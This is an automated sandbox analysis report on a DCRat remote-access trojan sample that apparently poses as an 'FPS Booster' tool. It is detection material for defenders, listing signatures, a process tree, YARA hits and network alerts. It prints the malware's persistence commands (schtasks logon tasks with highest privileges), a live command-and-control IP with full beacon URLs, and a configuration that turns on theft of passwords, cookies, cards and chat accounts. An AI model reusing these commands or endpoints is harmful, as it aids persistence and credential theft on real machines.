Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
UNFOT5F1qt.exe

Overview

General Information

Sample name:UNFOT5F1qt.exe
renamed because original name is a hash value
Original sample name:1C40D9E61FBBD5D9054638B98B10E1CF.exe
Analysis ID:1563543
MD5:1c40d9e61fbbd5d9054638b98b10e1cf
SHA1:145119e649cabc6c60200643b3cc347fc4b164cc
SHA256:854b586f8d0cad52a042ccee32691dc9c30e6a32bd3805024934f43e169325af
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected DCRat
.NET source code references suspicious native API functions
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Creates an autostart registry key pointing to binary in C:\Windows
Creates multiple autostart registry keys
Creates processes via WMI
Drops PE files to the user root directory
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • UNFOT5F1qt.exe (PID: 2000 cmdline: "C:\Users\user\Desktop\UNFOT5F1qt.exe" MD5: 1C40D9E61FBBD5D9054638B98B10E1CF)
    • UNFOT5F1qt.exe (PID: 1460 cmdline: "C:\Users\user\Desktop\UNFOT5F1qt.exe" MD5: 1C40D9E61FBBD5D9054638B98B10E1CF)
      • savesbrokerDriverSavesbroker.exe (PID: 7188 cmdline: "C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe" MD5: 222EDC84E2D32948F2639554B23E7B04)
        • schtasks.exe (PID: 7408 cmdline: schtasks.exe /create /tn "HSZUYllrTVQhIRaXpKBgYbmVnCoTc" /sc ONLOGON /tr "'C:\Recovery\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • schtasks.exe (PID: 7432 cmdline: schtasks.exe /create /tn "HSZUYllrTVQhIRaXpKBgYbmVnCoTc" /sc ONLOGON /tr "'C:\Recovery\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • schtasks.exe (PID: 7456 cmdline: schtasks.exe /create /tn "HSZUYllrTVQhIRaXpKBgYbmVnCoTc" /sc ONLOGON /tr "'C:\Users\All Users\Application Data\Application Data\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • schtasks.exe (PID: 7480 cmdline: schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Users\Default User\WmiPrvSE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • schtasks.exe (PID: 7504 cmdline: schtasks.exe /create /tn "WerFault" /sc ONLOGON /tr "'C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • schtasks.exe (PID: 7528 cmdline: schtasks.exe /create /tn "HSZUYllrTVQhIRaXpKBgYbmVnCoTc" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • schtasks.exe (PID: 7552 cmdline: schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\regedit\explorer.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • schtasks.exe (PID: 7576 cmdline: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Documents and Settings\Public\Pictures\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • WerFault.exe (PID: 7604 cmdline: "C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe" MD5: 222EDC84E2D32948F2639554B23E7B04)
      • FPS Booster 2.0.7.exe (PID: 7236 cmdline: "C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe" MD5: 74BE806E27A351565F2EC136DCB5232C)
    • WerFault.exe (PID: 7212 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2000 -s 1156 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • explorer.exe (PID: 7664 cmdline: C:\Windows\regedit\explorer.exe MD5: 222EDC84E2D32948F2639554B23E7B04)
  • HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe (PID: 7672 cmdline: "C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe" MD5: 222EDC84E2D32948F2639554B23E7B04)
  • HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe (PID: 8000 cmdline: "C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe" MD5: 222EDC84E2D32948F2639554B23E7B04)
  • explorer.exe (PID: 616 cmdline: "C:\Windows\regedit\explorer.exe" MD5: 222EDC84E2D32948F2639554B23E7B04)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Malware Configuration

Threatname: DCRat

{"H1": "http://188.120.228.203/MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/@==AbhNnclZXauVHdsVXYmVGZ", "H2": "http://188.120.228.203/MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/@==AbhNnclZXauVHdsVXYmVGZ", "TAG": "", "MUTEX": "DCR_MUTEX-9cHOEfz43eiRgQzXdpNO", "LDTM": false, "DBG": false, "BCS": 0, "AUR": 1, "ASCFG": {"ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": false, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true}, "AS": true, "ASO": true, "ASP": "%UsersFolder% - Fast", "AK": true, "AD": false}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security
    C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeMALWARE_Win_DCRatDCRat payloadditekSHen
      • 0x66bb0:$x1: px"><center>DCRat Keylogger
      • 0x7b998:$x2: DCRat-Log#
      • 0x64ca0:$x3: DCRat.Code
      • 0x65f75:$v1: Plugin couldn't process this action!
      • 0x65fbf:$v2: Unknown command!
      • 0x66137:$v3: PLUGINCONFIGS
      • 0x7b9d4:$v4: Saving log...
      • 0x7b9f0:$v5: ~Work.log
      • 0x64948:$v6: MicrophoneNum
      • 0x64990:$v7: WebcamNum
      • 0x662b5:$v8: %SystemDrive% - Slow
      • 0x662df:$v9: %UsersFolder% - Fast
      • 0x66309:$v10: %AppData% - Very Fast
      • 0x66619:$v11: <span style="color: #F85C50;">[Up]</span>
      • 0x6666d:$v11: <span style="color: #F85C50;">[Down]</span>
      • 0x66777:$v11: <span style="color: #F85C50;">[Enter]</span>
      • 0x667d1:$v11: <span style="color: #F85C50;">[ESC]</span>
      • 0x66827:$v11: <span style="color: #F85C50;">[CTRL]</span>
      • 0x6687f:$v11: <span style="color: #F85C50;">[Shift]</span>
      • 0x66931:$v11: <span style="color: #F85C50;">[Win]</span>
      • 0x66987:$v11: <span style="color: #F85C50;">[Tab]</span>
      C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x7e269:$s8: Win32_ComputerSystem
      • 0x7e368:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x7e405:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x7e51a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x64e06:$cnc4: POST / HTTP/1.1
      C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security
        Click to see the 27 entries

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000017.00000002.1520715428.000000000285A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
          00000013.00000002.1476965095.0000000002EE0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
            00000005.00000002.1397323956.0000000002BF0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
              00000005.00000000.1348990255.0000000000822000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                00000005.00000000.1348990255.0000000000822000.00000002.00000001.01000000.00000007.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                • 0x7e069:$s8: Win32_ComputerSystem
                • 0x7e168:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                • 0x7e205:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                • 0x7e31a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                • 0x64c06:$cnc4: POST / HTTP/1.1
                Click to see the 9 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                5.0.savesbrokerDriverSavesbroker.exe.820000.0.unpackJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                  5.0.savesbrokerDriverSavesbroker.exe.820000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                    5.0.savesbrokerDriverSavesbroker.exe.820000.0.unpackMALWARE_Win_DCRatDCRat payloadditekSHen
                    • 0x66bb0:$x1: px"><center>DCRat Keylogger
                    • 0x7b998:$x2: DCRat-Log#
                    • 0x64ca0:$x3: DCRat.Code
                    • 0x65f75:$v1: Plugin couldn't process this action!
                    • 0x65fbf:$v2: Unknown command!
                    • 0x66137:$v3: PLUGINCONFIGS
                    • 0x7b9d4:$v4: Saving log...
                    • 0x7b9f0:$v5: ~Work.log
                    • 0x64948:$v6: MicrophoneNum
                    • 0x64990:$v7: WebcamNum
                    • 0x662b5:$v8: %SystemDrive% - Slow
                    • 0x662df:$v9: %UsersFolder% - Fast
                    • 0x66309:$v10: %AppData% - Very Fast
                    • 0x66619:$v11: <span style="color: #F85C50;">[Up]</span>
                    • 0x6666d:$v11: <span style="color: #F85C50;">[Down]</span>
                    • 0x66777:$v11: <span style="color: #F85C50;">[Enter]</span>
                    • 0x667d1:$v11: <span style="color: #F85C50;">[ESC]</span>
                    • 0x66827:$v11: <span style="color: #F85C50;">[CTRL]</span>
                    • 0x6687f:$v11: <span style="color: #F85C50;">[Shift]</span>
                    • 0x66931:$v11: <span style="color: #F85C50;">[Win]</span>
                    • 0x66987:$v11: <span style="color: #F85C50;">[Tab]</span>
                    5.0.savesbrokerDriverSavesbroker.exe.820000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                    • 0x7e269:$s8: Win32_ComputerSystem
                    • 0x7e368:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                    • 0x7e405:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                    • 0x7e51a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                    • 0x64e06:$cnc4: POST / HTTP/1.1

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Files With System Process Name In Unsuspected Locations
                    Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe, ProcessId: 7188, TargetFilename: C:\Users\Default User\WmiPrvSE.exe
                    Sigma detected: System File Execution Location Anomaly
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\Windows\regedit\explorer.exe, CommandLine: C:\Windows\regedit\explorer.exe, CommandLine|base64offset|contains: , Image: C:\Windows\regedit\explorer.exe, NewProcessName: C:\Windows\regedit\explorer.exe, OriginalFileName: C:\Windows\regedit\explorer.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1124, ProcessCommandLine: C:\Windows\regedit\explorer.exe, ProcessId: 7664, ProcessName: explorer.exe
                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Recovery\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe, ProcessId: 7188, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HSZUYllrTVQhIRaXpKBgYbmVnCoTc
                    Sigma detected: Startup Folder File Write
                    Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\UNFOT5F1qt.exe, ProcessId: 1460, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
                    Sigma detected: Suspicious Add Scheduled Task Parent
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "HSZUYllrTVQhIRaXpKBgYbmVnCoTc" /sc ONLOGON /tr "'C:\Recovery\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe'" /rl HIGHEST /f, CommandLine: schtasks.exe /create /tn "HSZUYllrTVQhIRaXpKBgYbmVnCoTc" /sc ONLOGON /tr "'C:\Recovery\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe'" /rl HIGHEST /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe, ParentProcessId: 7188, ParentProcessName: savesbrokerDriverSavesbroker.exe, ProcessCommandLine: schtasks.exe /create /tn "HSZUYllrTVQhIRaXpKBgYbmVnCoTc" /sc ONLOGON /tr "'C:\Recovery\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe'" /rl HIGHEST /f, ProcessId: 7408, ProcessName: schtasks.exe

                    Persistence and Installation Behavior

                    barindex
                    Sigma detected: Schedule system process
                    Source: Process startedAuthor: Joe Security: Data: Command: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Documents and Settings\Public\Pictures\RuntimeBroker.exe'" /rl HIGHEST /f, CommandLine: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Documents and Settings\Public\Pictures\RuntimeBroker.exe'" /rl HIGHEST /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe, ParentProcessId: 7188, ParentProcessName: savesbrokerDriverSavesbroker.exe, ProcessCommandLine: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Documents and Settings\Public\Pictures\RuntimeBroker.exe'" /rl HIGHEST /f, ProcessId: 7576, ProcessName: schtasks.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-27T04:02:07.712551+010020341941A Network Trojan was detected192.168.2.949723188.120.228.20380TCP
                    2024-11-27T04:02:17.428898+010020341941A Network Trojan was detected192.168.2.949746188.120.228.20380TCP
                    2024-11-27T04:02:25.553488+010020341941A Network Trojan was detected192.168.2.949767188.120.228.20380TCP
                    2024-11-27T04:02:33.366043+010020341941A Network Trojan was detected192.168.2.949785188.120.228.20380TCP
                    2024-11-27T04:02:42.961482+010020341941A Network Trojan was detected192.168.2.949806188.120.228.20380TCP
                    2024-11-27T04:02:51.179051+010020341941A Network Trojan was detected192.168.2.949827188.120.228.20380TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: UNFOT5F1qt.exeAvira: detected
                    Antivirus detection for URL or domain
                    Source: http://188.120.228.203/MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?8zuOabaF=gPSN2e2E7Tr63&qfhjpvFDRBKGR2CDKyYQ=FUKx&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&8zuOabaF=gPSN2e2E7Tr63&qfhjpvFDRBKGR2CDKyYQ=FUKxAvira URL Cloud: Label: malware
                    Source: http://188.120.228.203/MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?iXKVlgV1rJUk18ntWeDto2=ehI8yOvjOVLkpjdj5bnrkCHcyD&VUNJCpiqydhhm6jGOqX8J25HRAKN=ZpKuVZPAMJ5G3pF&3BvB63waEtcZG=BeVOYxXxQgUGChc2QNztX9ZLfg3t&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&iXKVlgV1rJUk18ntWeDto2=ehI8yOvjOVLkpjdj5bnrkCHcyD&VUNJCpiqydhhm6jGOqX8J25HRAKN=ZpKuVZPAMJ5G3pF&3BvB63waEtcZG=BeVOYxXxQgUGChc2QNztX9ZLfg3tAvira URL Cloud: Label: malware
                    Source: http://188.120.228.203/MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?u94aa9EjMqWeOdgENIA88=a3V2bxddqzBJK7Zui3PhuF6&uzM88ZiIqBiAFihRGs9gdFSiockHtb7=7WHmkffRQ2dI&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&u94aa9EjMqWeOdgENIA88=a3V2bxddqzBJK7Zui3PhuF6&uzM88ZiIqBiAFihRGs9gdFSiockHtb7=7WHmkffRQ2dIAvira URL Cloud: Label: malware
                    Source: http://188.120.228.203/MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?x7sAZ9s8LIMWmsWdYRkexiMsvuP818e=MsDQCmtwup8&WOQPE7JGakLPu9OpuuGMn3K4oG=viytIjYVgdA44zY&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&x7sAZ9s8LIMWmsWdYRkexiMsvuP818e=MsDQCmtwup8&WOQPE7JGakLPu9OpuuGMn3K4oG=viytIjYVgdA44zYAvira URL Cloud: Label: malware
                    Source: http://188.120.228.203/MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?k1RxxsMic1WB03Lj3Jl0wy=eC69X&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&k1RxxsMic1WB03Lj3Jl0wy=eC69XAvira URL Cloud: Label: malware
                    Source: http://188.120.228.203/MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?iXlp95Y2OIhl=j2BPpjdF4opH2L&pCeLVPpGxY9MMAtCHVPqjeDNU=Qnt5hGtlMMnVQK3wN0qXQFLliw&fNL8Q1g9CW202ckxhZwE=wwQN&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&iXlp95Y2OIhl=j2BPpjdF4opH2L&pCeLVPpGxY9MMAtCHVPqjeDNU=Qnt5hGtlMMnVQK3wN0qXQFLliw&fNL8Q1g9CW202ckxhZwE=wwQNAvira URL Cloud: Label: malware
                    Antivirus detection for dropped file
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeAvira: detection malicious, Label: HEUR/AGEN.1309950
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeAvira: detection malicious, Label: HEUR/AGEN.1309950
                    Source: C:\Users\Default\WmiPrvSE.exeAvira: detection malicious, Label: HEUR/AGEN.1309950
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeAvira: detection malicious, Label: HEUR/AGEN.1309950
                    Source: C:\Users\Public\Pictures\RuntimeBroker.exeAvira: detection malicious, Label: HEUR/AGEN.1309950
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeAvira: detection malicious, Label: HEUR/AGEN.1309950
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeAvira: detection malicious, Label: HEUR/AGEN.1309950
                    Source: C:\Windows\regedit\explorer.exeAvira: detection malicious, Label: HEUR/AGEN.1309950
                    Found malware configuration
                    Source: explorer.exe.7664.18.memstrminMalware Configuration Extractor: DCRat {"H1": "http://188.120.228.203/MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/@==AbhNnclZXauVHdsVXYmVGZ", "H2": "http://188.120.228.203/MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/@==AbhNnclZXauVHdsVXYmVGZ", "TAG": "", "MUTEX": "DCR_MUTEX-9cHOEfz43eiRgQzXdpNO", "LDTM": false, "DBG": false, "BCS": 0, "AUR": 1, "ASCFG": {"ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": false, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true}, "AS": true, "ASO": true, "ASP": "%UsersFolder% - Fast", "AK": true, "AD": false}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeReversingLabs: Detection: 88%
                    Source: C:\ProgramData\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeReversingLabs: Detection: 88%
                    Source: C:\Recovery\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeReversingLabs: Detection: 88%
                    Source: C:\Users\Default\WmiPrvSE.exeReversingLabs: Detection: 88%
                    Source: C:\Users\Public\Pictures\RuntimeBroker.exeReversingLabs: Detection: 88%
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeReversingLabs: Detection: 88%
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeReversingLabs: Detection: 88%
                    Source: C:\Windows\regedit\explorer.exeReversingLabs: Detection: 88%
                    Multi AV Scanner detection for submitted file
                    Source: UNFOT5F1qt.exeReversingLabs: Detection: 52%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exeJoe Sandbox ML: detected
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeJoe Sandbox ML: detected
                    Source: C:\Users\Default\WmiPrvSE.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeJoe Sandbox ML: detected
                    Source: C:\Users\Public\Pictures\RuntimeBroker.exeJoe Sandbox ML: detected
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeJoe Sandbox ML: detected
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeJoe Sandbox ML: detected
                    Source: C:\Windows\regedit\explorer.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: UNFOT5F1qt.exeJoe Sandbox ML: detected
                    Source: UNFOT5F1qt.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exeDirectory created: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exeJump to behavior
